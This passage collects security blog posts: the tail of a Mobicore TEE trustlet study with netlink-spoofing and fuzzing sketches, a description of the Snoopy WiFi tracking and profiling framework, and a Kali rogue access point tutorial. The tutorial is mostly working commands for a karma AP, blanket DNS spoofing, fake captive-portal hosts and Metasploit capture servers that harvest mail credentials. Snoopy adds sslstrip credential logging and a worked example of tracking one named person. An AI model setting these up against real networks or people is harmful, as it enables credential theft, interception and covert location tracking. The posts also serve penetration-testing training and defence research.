client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b

trustlet response (wsm): 08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000

trustlet text output (mapped buffer 2):
==================================================
SRVXInvokeCommand command 1000000 hSession=320b4
SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25
SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074
SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48
SERVICE_DRM_BBX_SetKeyToOemContext type=5
SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48
SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer
DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4
DxDecryptAsset calling Oem_Aes_SetKey
DxDecryptAsset calling DRM_Aes_CtrProcessData
DxDecryptAsset calling DRM_HMAC_CreateMAC iDatatLen=32
DxDecryptAsset after calling DRM_HMAC_CreateMAC
DxDecryptAsset END
SERVICE_DRM_BBX_SetKeyToOemContext calling DRM_BBX_SetKeyToOemContext
SRVXInvokeCommand.id=0x1000000 res=0x0
==================================================

By mapping the information disclosed in the trustlet text output to the client command, the following format was derived:

08022000: virtual memory address of the text output buffer in the secure world (little-endian form of 0x200208)
b4200300: PlayReady session ID
00000001: command ID (0x1000000)
00000000: error code (0x0 = no error, set by the trustlet after 
mcWaitNotification())
25000000: parameter type (0x25)
28023000: virtual memory address of the parameter buffer in the secure world (little-endian form of 0x300228)
30000000: parameter length in bytes (0x30, the encrypted key length)
05000000: encryption key type (0x5)

The trustlet receives client-supplied memory addresses as input, which could be manipulated by an attacker. We'll test this attack later. The captured PlayReady session involved 18 command/response pairs that correspond to the following high-level diagram of the PlayReady DRM algorithm published by G&D. I couldn't find a more detailed specification of PlayReady DRM on MSDN or other web sites. At this stage, however, I was not interested in the implementation details of the PlayReady scheme: I didn't want to attack the DRM itself, but to find an exploitable issue such as a buffer overflow or memory disclosure in the trustlet. DRM Trustlet diagram (courtesy of G&D)

Security Tests: I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that could be exploited by an Android application to attack other applications or achieve code execution in the Android kernel space. I found one issue in the Mobicore kernel API, which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers a Linux netlink server with id=17, intended to be called from kernel space; however, a Linux user-space process can create a spoofed message using netlink sockets and send it to the Mobicore kernel driver's netlink listener, which, as shown in the following figure, did not check the PID of the calling process. As a result, any Android app could call Mobicore APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below. 
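The spoofed-message construction itself is simple. Below is a minimal Python sketch (the post's own tooling is C) that only builds the raw netlink message bytes with an attacker-chosen sequence number; sending it would use a netlink socket opened with the protocol number 17 mentioned above, and the payload here is a placeholder, not the real Mobicore command structure.

```python
import struct

# struct nlmsghdr layout (linux/netlink.h):
#   u32 nlmsg_len, u16 nlmsg_type, u16 nlmsg_flags, u32 nlmsg_seq, u32 nlmsg_pid
NLMSG_HDRLEN = 16

def build_netlink_msg(seq, payload, msg_type=0, flags=0, pid=0):
    """Build a raw netlink message carrying an attacker-chosen sequence number."""
    length = NLMSG_HDRLEN + len(payload)
    header = struct.pack("=IHHII", length, msg_type, flags, seq, pid)
    return header + payload

# Spoofed message with seq=1, mirroring the demonstration in the post.
msg = build_netlink_msg(seq=1, payload=b"\x00" * 8)
```

On a rooted device the message would then be written to a `socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, 17)` socket; that part is omitted since it requires the Mobicore driver to be present.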
An attacker would need to know the "sequence number" of an already established netlink connection between a kernel component (such as IPSEC) and the Mobicore driver in order to exploit this vulnerability. These sequence numbers are incremental, starting from zero, but since there is currently no kernel component on the Samsung phone that uses the Mobicore API, the issue is not high risk. We notified the vendor about this issue 6 months ago but haven't received any response regarding a planned fix. The following figures demonstrate exploitation of this issue from an unprivileged Android process:

Netlink message (seq=1) sent to the Mobicore kernel driver from a low-privileged process

Unauthorised netlink message being processed by the Mobicore kernel driver

In the next phase of my tests, I focused on fuzzing the PlayReady DRM trustlet mentioned in the previous section, by writing simple C programs linked against libMcClient.so and manipulating DWORD values such as the shared buffer virtual address. 
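As a rough illustration of that mutation step, here is a Python sketch (the actual fuzzers were C programs linked against libMcClient.so) that overwrites one little-endian DWORD in a copy of the captured WSM command; the replacement value is arbitrary.

```python
import struct

# Captured 52-byte WSM client command from the session log above.
WSM_HEX = (
    "08022000" "b4200300" "00000001" "00000000"
    "25000000" "28023000" "30000000" "05000000"
    "00000000" "00000000" "0000b072" "00000000" "00000000"
)

def mutate_dword(wsm, offset, value):
    """Return a copy of the WSM buffer with one little-endian DWORD overwritten."""
    out = bytearray(wsm)
    out[offset:offset + 4] = struct.pack("<I", value)
    return bytes(out)

wsm = bytes.fromhex(WSM_HEX)
# Offset 0 holds the secure-world output buffer address
# (bytes 08 02 20 00, i.e. 0x00200208 little-endian);
# drive it below the original value, the case that crashed the fuzzer.
fuzzed = mutate_dword(wsm, 0, 0x08021000)
```

A real run would write the mutated bytes back into the mapped WSM and call mcNotify(), then check whether mcWaitNotification() returns an error.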
The following table summarises the results:

wsm offset | Description | Results
-----------|-------------|---------
0  | Memory address of the mapped output buffer in the trustlet process (original value=0x08022000) | For values < 0x8022000 the fuzzer crashed; for values > 0x8022000, no errors
41 | Memory address of the parameter mapped buffer in the trustlet process (original value=0x28023000) | For 0x00001000 < value < 0x28023000 the fuzzer crashed; for value >= 00001000 the trustlet exits with "parameter refers to secure memory area"; for value > 0x28023000, no errors
49 | Parameter length (encryption key or certificate file length) | For large numbers the trustlet exits with a "malloc() failed" message

The fuzzer crashes indicate that the Mobicore micro-kernel writes to memory addresses in the normal world beyond the shared memory buffer, which is not a critical security issue: it means the fuzzer can only attack itself, not other processes. The "parameter refers to secure memory area" message suggests that there is some input validation implemented in the Mobicore OS or the DRM trustlet that prevents the normal world's access to mapped addresses other than the shared buffers. I haven't yet fuzzed the parameter values themselves, for example by manipulating the PlayReady XML data elements sent from the client to the trustlet; there might be vulnerabilities in the PlayReady implementation that smarter fuzzing could pick up.

Conclusion: We demonstrated that intercepting and manipulating the world shared memory (WSM) data can be used to gain better knowledge of the internal workings of Mobicore trustlets. We believe this method can be combined with side channel measurements to perform blackbox security assessment of mobile TEE applications. 
The context switching and memory sharing between the normal and secure worlds could be subject to side channel attacks in specific cases, and we are focusing our future research on this area. - See more at: SensePost Blog
  24. At this year's 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users through the use of WiFi. The talk was well received (going by what people said afterwards) by those attending the conference, and it was great to see so many others as excited about this as we have been. In addition to the research, we both took a different approach to the presentation itself. A 'no bullet points' approach was decided upon, so the slides themselves won't be that revealing. Using Steve Jobs as our inspiration, we wanted to bring back the fun to technical conferences, and our presentation hopefully reflected that. As I type this, I have been reliably informed that the DVD, and the subsequent videos of the talk, are being mastered and will be ready shortly. Once we have them, we will update this blog post. In the meantime, below is a description of the project.

Background
There have been recent initiatives from numerous governments to legalise the monitoring of citizens' Internet-based communications (web sites visited, emails, social media) under the guise of anti-terrorism. Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD-level staff are plentiful in this sphere.

Snoopy
The above inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds, could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data? 
Rather than terrorist-hunting, we would perform simple tracking and real-time + historical profiling of devices and the people who own them. It is perhaps worth mentioning at this point that Snoopy is comprised of various existing technologies combined into one distributed framework. "Snoopy is a distributed tracking and profiling framework." Below is a diagram of the Snoopy architecture, which I'll elaborate on:

1. Distributed?
Snoopy runs client-side code on any Linux device that has support for wireless monitor mode / packet injection. We call these "drones" due to their optimal nature of being small, inconspicuous, and disposable. Examples of drones we used include the Nokia N900, Alfa R36 router, Sheeva plug, and the RaspberryPi. Numerous drones can be deployed over an area (say 50 all over London) and each device will upload its data to a central server.

2. WiFi?
A large number of people leave their WiFi on. Even security-savvy folk; for example, at BlackHat I observed >5,000 devices with their WiFi on. As per the RFC documentation (i.e. not down to individual vendors), client devices send out 'probe requests' looking for networks that the devices have previously connected to (and the user chose to save). The reason for this appears to be twofold: (i) to find hidden APs (not broadcasting beacons) and (ii) to aid quick transition when moving between APs with the same name (e.g. if you have 50 APs in your organisation with the same name). Fire up a terminal and bang out this command to see these probe requests:

tshark -n -i mon0 subtype probereq

(where mon0 is your wireless device, in monitor mode)

3. Tracking?
Each Snoopy drone collects every observed probe request and uploads it to a central server (timestamp, client MAC, SSID, GPS coordinates, and signal strength). 
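Each uploaded observation can be sketched as a simple record; the field names and CSV wire format below are hypothetical, chosen only to illustrate the tuple just described.

```python
from dataclasses import dataclass

@dataclass
class ProbeObservation:
    timestamp: float   # epoch seconds when the probe request was seen
    client_mac: str    # source MAC of the probing device
    ssid: str          # network name the device probed for
    lat: float         # drone GPS latitude
    lon: float         # drone GPS longitude
    rssi: int          # received signal strength (dBm)

def to_csv_row(obs):
    """Serialise one observation for upload to the central server."""
    return f"{obs.timestamp},{obs.client_mac},{obs.ssid},{obs.lat},{obs.lon},{obs.rssi}"

obs = ProbeObservation(1347364500.0, "00:11:22:33:44:55",
                       "BTHomeHub-FG12", 51.5308, -0.1238, -67)
```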
On the server side, client observations are grouped into 'proximity sessions': i.e. device 00:11:22:33:44:55 was sending probes from 11:15 until 11:45, and we can therefore infer that it was within proximity to that particular drone during that time. We now know that this device (and therefore its human) was at a certain location at a certain time. Given enough monitoring stations running over enough time, we can track devices/humans based on this information.

4. Passive Profiling?
We can profile device owners via the network SSIDs in the captured probe requests. This can be done in two ways: simple analysis, and geo-locating. Simple analysis could be along the lines of "Hmm, you've previously connected to hooters, mcdonalds_wifi, and elCheapoAirlines_wifi - you must be an average Joe" vs "Hmm, you've previously connected to BA_firstclass, ExpensiveRestaurant_wifi, etc - you must be a high roller". Of more interest, we can potentially geo-locate network SSIDs to GPS coordinates via services like Wigle (whose database is populated via wardriving), and then go from GPS coordinates to a street address and street view photographs via Google. What's interesting here is that as security folk we've been telling users for years that picking unique SSIDs when using WPA[2] is a "good thing" because the SSID is used as a salt. A side effect of this is that geo-locating your unique networks becomes much easier. Also, we can typically instantly tell where you work and where you live based on the network name (e.g. BTBusinessHub-AB12 vs BTHomeHub-FG12). The result: you walk past a drone, and I get a street view photograph of where you live, work and play.

5. Rogue Access Points, Data Interception, MITM attacks?
Snoopy drones have the ability to bring up rogue access points. That is to say, if your device is probing for "Starbucks", we'll pretend to be Starbucks, and your device will connect. This is not new, and dates back to Karma in 2005. 
The attack may have been ahead of its time, given the far smaller number of wireless devices back then. Now that every man and his dog has a WiFi-enabled smartphone, the attack is much more relevant. Snoopy differentiates itself with its rogue access points in the way data is routed. Your typical Pineapple, Silica, or various other products store all intercepted data locally, and mangle data locally too. Snoopy drones route all traffic via an OpenVPN connection to a central server. This has several implications:
(i) We can observe traffic from *all* drones in the field at one point on the server.
(ii) Any traffic manipulation needs only be done on the server, and not once per drone.
(iii) Since each drone hands out its own DHCP range, when observing network traffic on the server we see the source IP address of the connected clients (resulting in a unique mapping of MAC <-> IP <-> network traffic).
(iv) Due to the nature of the connection, the server can directly access the client devices. We could therefore run nmap, Metasploit, etc directly from the server, targeting the client devices. This is a much more desirable approach compared to running such 'heavy' software on the drone (as the Pineapple, or Pwnphone/plug would).
(v) Due to the drone not storing data or malicious tools locally, there is little harm if the device is stolen, or captured by an adversary.

On the Snoopy server, the following is deployed with respect to web traffic:
(i) Transparent Squid server - logs IP, websites, domains, and cookies to a database
(ii) sslstrip - transparently hijacks HTTP traffic and prevents HTTPS upgrade by watching for HTTPS links and redirecting. It then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. All credentials are logged to the database (thanks Ian & Junaid).
(iii) mitmproxy.py - allows for arbitrary code injection, as well as the use of self-signed SSL certificates. 
By default we inject some JavaScript which profiles the browser to discern the browser version, what plugins are installed, etc (thanks Willem). Additionally, a traffic analysis component extracts and reassembles files, e.g. PDFs, VoIP calls, etc (thanks Ian).

6. Higher Level Profiling?
Given that we can intercept network traffic (and have clients' cookies/credentials/browsing habits/etc) we can extract useful information via social media APIs. For example, we could retrieve all Facebook friends, or Twitter followers.

7. Data Visualization and Exploration?
Snoopy has two interfaces on the server: a web interface (thanks Walter), and Maltego transforms.

-The Web Interface
The web interface allows basic data exploration, as well as mapping. The mapping part is the most interesting - it displays the position of Snoopy drones (and client devices within proximity) over time. This is depicted below:

-Maltego
Maltego Radium has recently been released, and it is one awesome piece of kit for data exploration and visualisation. What's great about the Radium release is that you can combine multiple transforms together into 'machines'. A few example transformations were created, to demonstrate:

1. Devices Observed at both 44Con and BlackHat Vegas
Here we depict devices that were observed at both 44Con and BlackHat Las Vegas, as well as the SSIDs they probed for.

2. Devices at 44Con, pruned
Here we look at all devices and the SSIDs they probed for at 44Con. The pruning consisted of removing all SSIDs that only one client was looking for, or those for which more than 20 were probing. This could reveal 'relationship' SSIDs. For example, if several people from the same company were attending, they could all be looking for their work SSID. In this case, we noticed the '44Con crew' network being quite popular. To further illustrate Snoopy we 'targeted' these poor chaps, figuring out where they live, as well as their Facebook friends (pulled from intercepted network traffic*). 
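The server-side grouping of observations into 'proximity sessions', described in the Tracking section above, can be sketched as follows; the five-minute session gap is a hypothetical parameter, not a value from Snoopy itself.

```python
def proximity_sessions(timestamps, gap=300.0):
    """Group one device's observation times at one drone into sessions.

    A new session starts whenever the gap between consecutive
    observations exceeds `gap` seconds; each session is returned
    as a (first_seen, last_seen) pair.
    """
    sessions = []
    for t in sorted(timestamps):
        if sessions and t - sessions[-1][1] <= gap:
            sessions[-1][1] = t          # extend the current session
        else:
            sessions.append([t, t])      # start a new session
    return [(start, end) for start, end in sessions]

# Device seen continuously for ten minutes, once in isolation,
# then again for a couple of minutes an hour later.
times = [0, 120, 300, 600, 1800, 5400, 5500]
```

Running `proximity_sessions(times)` yields three sessions, matching the "probes from 11:15 until 11:45, therefore nearby" inference described earlier.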
Snoopy Field Experiment
We collected broadcast probe requests to create two main datasets. I collected data at BlackHat Vegas, and four of us sat in various London underground stations with Snoopy drones running for 2 hours. Furthermore, I sat at King's Cross station for 13 hours (!?) collecting data. Of course it may have made more sense to just deploy an unattended Sheeva plug, or hide a device with a large battery pack - but that could've resulted in trouble with the law (if spotted on CCTV). I present several graphs depicting the outcome of these trials. The pie chart below depicts the proportion of observed devices per vendor, from the total sample of 77,498 devices. It is interesting to see Apple's dominance. The bar chart below depicts the average number of broadcast SSIDs from a random sample of 100 devices per vendor (standard deviation bars need to be added - it was quite a spread). The bar chart below depicts my day sitting at King's Cross station. The horizontal axis depicts chunks of time per hour, and the vertical axis the number of unique device observations. We clearly see the rush hours.

Potential Use
What could be done with Snoopy? There are likely legal, borderline, and illegal activities. Such is the case with any technology.

Legal
-Collecting anonymized statistics on thoroughfare. For example, Transport for London could deploy these devices at every London underground station to get statistics on peak human traffic. This would allow them to deploy more staff, or open more pathways, etc. Such data over a period of months and years would likely be of use for future planning.
-Penetration testers targeting clients to demonstrate the WiFi threat.

Borderline
-This type of technology could likely appeal to advertisers. For example, a reseller of a certain brand of jeans may note that persons who prefer certain technologies (e.g. Apple) frequent certain locations. 
-Companies could deploy drones in each of their establishments (supermarkets, nightclubs, etc) to monitor user preference, e.g. observing a migration of customers from one establishment to another after the deployment of certain incentives (promotions, a new layout).
-Imagine the Government deploying hundreds of drones all over a city, and then having field agents with mobile drones in their pockets. This could be a novel way to track down or follow criminals. The other side of the coin, of course, being that they track all of us...

Illegal
-Let's pretend we want to target David Beckham. We could attend several public events at which David is present (drone in pocket), ensuring we are within reasonable proximity to him. We would then look for the overlap of commonly observed devices over time at all of these functions. Once we get down to one device observed via this intersection, we could assume the device belongs to David. Perhaps at this point we could bring up a rogue access point that only targets his device, and proceed maliciously from there. Or just satisfy ourselves by geolocating the places he frequents.
-Botnet infections, malware distribution. That doesn't sound very nice. Snoopy drones could be used to infect users' devices, either by injecting malicious web traffic, or by firing exploits from the Snoopy server at devices.
-Unsolicited advertising. Imagine browsing the web, and an unscrupulous 3rd party injects viagra adverts at the top of every visited page?

Similar tools
Immunity's Stalker and Silica
Hubert's iSniff GPS

Snoopy in the Press
Risky Biz Podcast
Naked Scientist Podcast (transcript)
The Register
Fierce Broadband Wireless

***FAQ***
Q. But I use WPA2 at home, you can't hack me!
A. True - if I pretend to be a WPA[2] network, association will fail. However, I bet your device is probing for at least one open network, and when I pretend to be that one I'll get you.

Q. I use Apple/Android/Foobar - I'm safe!
A. 
This attack is not dependent on device/manufacturer. It's a function of the WiFi specification. The vast majority of observed devices were in fact Apple (>75%).

Q. How can I protect myself?
A. Turn off your WiFi when you leave home/work. Be cautious about using it in public places too - especially on open networks (like Starbucks).
A. On Android and on your desktop/laptop you can selectively remove SSIDs from your saved list. As for iPhones, there doesn't seem to be an option - please correct me if I'm wrong.
A. It'd be great to write an application for iPhone/Android that turns off probe requests, and only sends them if a beacon from a known network name is received.

Q. Your research is dated and has been done before!
A. Some of the individual components, perhaps. Having them strung together in our distributed configuration is new (AFAIK). Also, some original ideas were unfortunately published first, as often happens with these things.

Q. But I turn off WiFi, you'll never get me!
A. It was interesting to note how many people actually leave WiFi on, e.g. 30,000 people at a single London station during one day. WiFi is only one avenue of attack; look out for the next release using Bluetooth, GSM, NFC, etc.

Q. You're doing illegal things and you're going to jail!
A. As mentioned earlier, the broadcast nature of probe requests means no laws (in the UK) are being broken. Furthermore, I spoke to a BT engineer at 44Con, and he told me that there's no copyright on SSID names - i.e. there's nothing illegal about pretending to be "BTOpenzone" or "SkyHome-AFA1". However, I suspect that at the point where you start monitoring/modifying network traffic you may get in trouble. It is interesting to note that in the USA a judge ruled that data interception on an open network is not illegal.

Q. But I run iOS 5/6 and they say this is fixed!!
A. Mark Wuergler of Immunity, Inc did find a flaw whereby iOS devices leaked info about the last 3 networks they had connected to. 
The BSSID was included in ARP requests, which meant anyone sniffing the traffic originating from that device would be privy to the addresses. Snoopy only looks at broadcast SSIDs at this stage - and so this fix is unrelated. We haven't done any tests with the latest iOS, but will update the blog when we have done so.

Q. I want Snoopy!
A. I'm working on it. Currently tidying up code, writing documentation, etc. Soon. - See more at: SensePost Blog
  25. Rogue Access Points, a how-to Tags: blackhat, howto, public, wifi — dominic @ 13:11 In preparation for our wireless training course at BlackHat Vegas in a few weeks, I spent some time updating the content on rogue/spoofed access points. What we mean by this are access points under your control, that you attempt to trick a user into connecting to, rather than the "unauthorised access points" Bob in Marketing bought and plugged into your internal network for his team to use. I'll discuss how to quickly get a rogue AP up on Kali that will allow you to start gathering some creds, specifically mail creds. Once you have that basic pattern down, setting up more complex attacks is fairly easy. This is a fairly detailed "how-to" style blog entry that gives you a taste of what you can grab on our training course.

Preparation
First up, you'll need a wireless card that supports injection. The aircrack forums maintain a list. I'm using the Alfa AWUS036H. Students on our course each get one of these to keep. We buy them from Rokland, who always give us great service. Second, you'll need a laptop running Kali. The instructions here are pretty much the same for BackTrack (deprecated, use Kali). For this setup, you won't need upstream internet connectivity. In many ways setting up a "mitm" style rogue AP is much easier, but it requires that you have upstream connectivity, which means you have to figure out an upstream connection (if you want to be mobile this means buying data from a mobile provider) and prevents you from using your rogue in funny places like aeroplanes or data centres. We're going to keep things simple. Finally, you'll need to install some packages; I'll discuss those as we set each thing up.

Overview
We're going to string a couple of things together here:

Access Point <-> routing & firewalling <-> DHCP <-> spoof services (DNS & mail)

There are several ways you can do each of these depending on preference and equipment. 
I'll cover some alternatives, but here I'm going for quick and simple.

Access Point
Ideally, you should have a fancy wifi card with a Prism chipset that you can put into master mode, and have (digininja's karma-patched) hostapd play nicely with. But we don't have one of those, and will be using airbase-ng's soft AP capability. You won't get an AP that scales particularly well, or has decent throughput, or even guarantees that people can associate, but it's often good enough. For this section, we'll use a few tools: airbase-ng (via the aircrack-ng suite), macchanger and iw. You can install these with:

apt-get install aircrack-ng macchanger iw

First, let's practise some good opsec and randomise our MAC address, then, while we're at it, push up our transmit power. Assuming our wifi card has shown up as the device wlan0 (you can check with airmon-ng), we'll run:

ifconfig wlan0 down
macchanger -r wlan0 #randomise our MAC
iw reg set BO #change our regulatory domain to something more permissive
ifconfig wlan0 up
iwconfig wlan0 txpower 30 #1 Watt transmit power

Right, now we can set up the AP using airbase. We have some options, the biggest being whether you go for a KARMA-style attack or a point-network spoof.

airmon-ng start wlan0 #Put our card into monitor mode
airbase-ng -c6 -P -C20 -y -v mon0& #Set up our soft AP in karma mode
#airbase-ng -c6 -e "Internet" -v mon0& #Alternatively, set up our soft AP for 1 net (no karma)

Airbase has a couple of different ways to work. I'll explain the parameters:
-c channel; check which channel is the least occupied with airodump
-P (karma mode) respond to all probes, i.e. if a victim's device usually connects to the open network "Internet", it will probe to see if that network is nearby. Our AP will see the probe and helpfully respond. The device, not knowing that this isn't an ESS for the Internet network, will join our AP.
-y don't respond to broadcast probes, aka the "is there anyone out there" shout of wifi. 
This helps in busy areas to reduce the AP's workload.
-C20 after a probed-for network has been seen, keep sending beacons with that network name for 20 seconds afterwards. If you're having trouble connecting, increasing this can help, but not much.
-v be verbose
-e "Internet" pretend to be a specific fake ESSID. Using airodump to monitor for networks probed for by your victim, and just pretending to be that network (i.e. dropping -P and -y), can increase reliability for specific targets.

If you're putting this into a script, make sure to background the airbase process (the &). At this point, you should have an AP up and running.

Routing & IP Time

There are lots of options here: you could bridge the AP and your upstream interface, or you could NAT (NB you can't NAT from wifi to wifi). We're not using an upstream connection, so things are somewhat simpler; we're just going to give our AP an IP and add a route for its network. It's all standard unix tools here. The basics:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo '1' > /proc/sys/net/ipv4/ip_forward

This is good enough for our no-upstream AP, but if you wanted to use an upstream bridge, you could use the following alternates:

apt-get install bridge-utils #To get the brctl tool, only run this once
brctl addbr br0
brctl addif br0 eth0 #Assuming eth0 is your upstream interface
brctl addif br0 at0
ifconfig br0 up

If you wanted to NAT, you could use:

iptables --policy INPUT ACCEPT #Good housekeeping, clean the tables first
iptables --policy OUTPUT ACCEPT #Don't want to clear rules with a default DENY
iptables --policy FORWARD ACCEPT
iptables -t nat -F
iptables -F
#The actual NAT stuff
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i at0 -o eth0 -j ACCEPT

Legitimate Services

We need to have a fully functioning network, which requires some legitimate services. For our purposes, we only really need one: DHCP.
Metasploit does have a dhcpd service, but it seems to have a few bugs. I'd recommend using the standard isc-dhcp-server in Kali, which is rock solid.

apt-get install isc-dhcp-server #Only run this once
cat >> dhcpd.conf #We need to write the dhcp config file
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
^D #If you chose this method of writing the file, hit Ctrl-D
dhcpd -cf dhcpd.conf

Evil Services

We're going to cover three evil services here:

DNS spoofing
Captive portal detection avoidance
Mail credential interception services

DNS spoofing

Once again, there are a couple of ways you can do DNS spoofing. The easiest is to use Dug Song's dnsspoof. An alternative would be to use metasploit's fakedns, but I find that makes the metasploit output rather noisy. Since there's no upstream, we'll just spoof all DNS queries to point back to us.

apt-get install dsniff #Only run the first time
cat >> dns.txt
10.0.0.1 *
^D #As in hit Ctrl-D
dnsspoof -i at0 -f dns.txt& #Remember to background it if in a script

Captive Portal Detection Avoidance

Some OSes will try to detect whether they have internet access on first connecting to a network. Ostensibly, this is to figure out if there's a captive portal requiring login. Apple, BlackBerry and Windows devices all do this. Metasploit's http capture server has some buggy code to try and deal with this that you could use; however, I find the cleanest way is to just use apache and create some simple vhosts. You can download the apache config from here.

apt-get install apache2
wget http://www.sensepost.com/blogstatic/2013/07/apache-spoof_captive_portal.tar.gz
cd /
tar zxvf ~/apache-spoof_captive_portal.tar.gz
service apache2 start

This will create three vhosts (apple, blackberry & windows) that will help devices from those manufacturers believe they are on the internet.
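If you're scripting the whole setup rather than typing at a terminal, the interactive "cat >> file, then Ctrl-D" steps above can be replaced with here-docs. A sketch, reusing the dhcpd.conf and dns.txt contents from this post (the script wrapper itself is my own addition):

```shell
#!/bin/sh
# Sketch: write the dhcpd and dnsspoof config files non-interactively,
# with the same contents as the interactive steps above.
cat > dhcpd.conf <<'EOF'
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
EOF

cat > dns.txt <<'EOF'
10.0.0.1 *
EOF
```

The quoted 'EOF' delimiter stops the shell expanding anything inside the here-doc, so the files land on disk byte-for-byte as written.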
You can easily extend this setup to create fake capture pages for accounts.google.com, www.facebook.com, twitter.com etc. (students will get nice pre-prepared versions that write to msf's cred store). Because dnsspoof is pointing all queries back to our host, requests for Apple will hit our apache.

Mail credential interception

Next up, let's configure the mail interception. Here we're going to use metasploit's capture servers. I'll show how this can be used for mail, but once you've got this up, it's pretty trivial to get the rest up too (ala karmetasploit). All we need to do is create a resource script, then run it with msfconsole:

cat >> karma-mail.rc
use auxiliary/server/capture/imap
exploit -j
use auxiliary/server/capture/pop3
exploit -j
use auxiliary/server/capture/smtp
exploit -j
use auxiliary/server/capture/imap
set SRVPORT 993
set SSL true
exploit -j
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
exploit -j
use auxiliary/server/capture/smtp
set SRVPORT 465
set SSL true
exploit -j
^D #In case you're just joining us, yes that's a Ctrl-D
msfconsole -r karma-mail.rc #Fire it up

This will create six services listening on six different ports: three plain-text services for IMAP, POP3, and SMTP, and three SSL-enabled versions (although this won't cover services using STARTTLS). Metasploit will generate random certificates for the SSL. If you want to be smart about it, you can use your own certificates (or CJR's auxiliary/gather/impersonate_ssl). Once again, because dnsspoof is pointing everything at us, we can just wait for connections to be initiated. Depending on the device being used, users usually get some sort of cert warning (if your cert isn't trusted). Apple devices give you a fairly big, obvious warning, but if you click through it once, the device will permanently accept the cert and keep sending you creds, even when the phone is locked (yay). Metasploit will proudly display them in your msfconsole session.
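Since the resource script is just three modules repeated with and without SSL, you can also generate it from a loop instead of typing it out. This is my own convenience sketch; it produces the same six capture-module stanzas as the karma-mail.rc shown above:

```shell
#!/bin/sh
# Sketch: generate the karma-mail.rc resource script from a loop.
RC=karma-mail.rc
: > "$RC"  # truncate/create the file

# Plain-text listeners on the default ports
for proto in imap pop3 smtp; do
  printf 'use auxiliary/server/capture/%s\nexploit -j\n' "$proto" >> "$RC"
done

# SSL listeners on the usual implicit-TLS ports
for pair in imap:993 pop3:995 smtp:465; do
  proto=${pair%%:*}
  port=${pair##*:}
  printf 'use auxiliary/server/capture/%s\nset SRVPORT %s\nset SSL true\nexploit -j\n' \
    "$proto" "$port" >> "$RC"
done
```

Adding more capture services later (http, ftp, and friends, ala karmetasploit) is then just a matter of extending the first loop.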
For added certainty, set up a db so the creds command will work nicely.

Protections

When doing this stuff, it's interesting to see just how confusing the various warnings from certain OSes are, and how even security people get taken sometimes. To defend yourself, do the following:

Don't join "open" wifi networks. These get added to your PNL and probed for when you move around, and are sometimes hard to remove later.
Remove open wifi networks from your device's remembered networks. iOS in particular makes it really hard to figure out which open networks it has saved and is probing for. You can use something like airbase to figure that out (beacon out for 60s, for example) and tell the phone to "forget this network".
Use SSL and validate the *exact* certificate you expect. For example, my mail client will only follow through with its SSL negotiation if the *exact* certificate it's expecting is presented. If I join a network like this, it will balk at the fake certificate without prompting. It's easy, when you're in a rush and not thinking, to click another device's "Continue" button.

Conclusion

By this point, you should have a working rogue AP setup that will aggressively pursue probed-for networks (ala KARMA) and intercept mail connections to steal the creds. You can run this thing anywhere there are mobile devices (like the company canteen), and it's a fairly cheap way to grab credentials from a target organisation. This setup is also remarkably easy to extend to other uses. We briefly looked at using bridging or NAT'ting to create a mitm rogue AP, and I mentioned the other metasploit capture services as obvious extensions. You can also throw in tools like sslstrip/sslsniff.

If you'd like to learn more about this and other wifi hacking techniques, then check out our Hacking by Numbers - Unplugged edition course at Black Hat. We've got loads of space. If you'd like to read more, taddong's RootedCon talk from this year is a good place to start.
Source: SensePost Blog